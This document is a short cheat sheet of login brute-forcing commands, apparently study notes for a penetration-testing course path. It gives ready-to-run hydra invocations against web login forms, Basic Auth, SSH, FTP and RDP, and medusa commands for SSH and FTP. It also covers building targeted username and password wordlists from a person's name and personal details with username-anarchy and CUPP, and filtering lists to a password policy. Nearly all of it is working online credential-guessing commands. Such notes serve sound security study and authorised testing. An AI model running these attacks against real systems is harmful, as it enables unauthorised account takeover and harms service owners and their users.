Login Brute-Forcing
Online credential attacks from the CWES path: hydra (HTTP forms, SSH, FTP, RDP), medusa, and custom wordlist generation with username-anarchy, CUPP and policy filters. Every command separated.
Hydra
HTTP POST form - detect failure by error string:
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/2023-200_most_used_passwords.txt -f IP -s PORT http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"HTTP POST form - detect success by 302 redirect:
hydra -l admin -P passwords.txt www.example.com http-post-form "/login:user=^USER^&pass=^PASS^:S=302"HTTP Basic Auth:
hydra -l basic-auth-user -P passwords.txt 127.0.0.1 http-get / -s 81SSH on a specific port:
hydra -l satwossh -P passwords.txt ssh://IP:PORTFTP on a non-standard port:
hydra -L usernames.txt -P passwords.txt -s 2121 -V ftp.example.com ftpRDP with generated passwords:
hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 192.168.1.100 rdpMedusa
SSH:
medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M sshFTP (e.g. from inside an SSH pivot against localhost):
medusa -h 127.0.0.1 -u ftpuser -P passwords.txt -M ftp -t 5Custom wordlists
Username variations from a real name:
./username-anarchy Jane Smith > jane_smith_usernames.txtCUPP - targeted list from personal info:
cupp -iFilter a wordlist to a password policy (8+ chars, upper, lower, digit):
grep -E '^.{8,}$' darkweb2017-top10000.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' > final.txt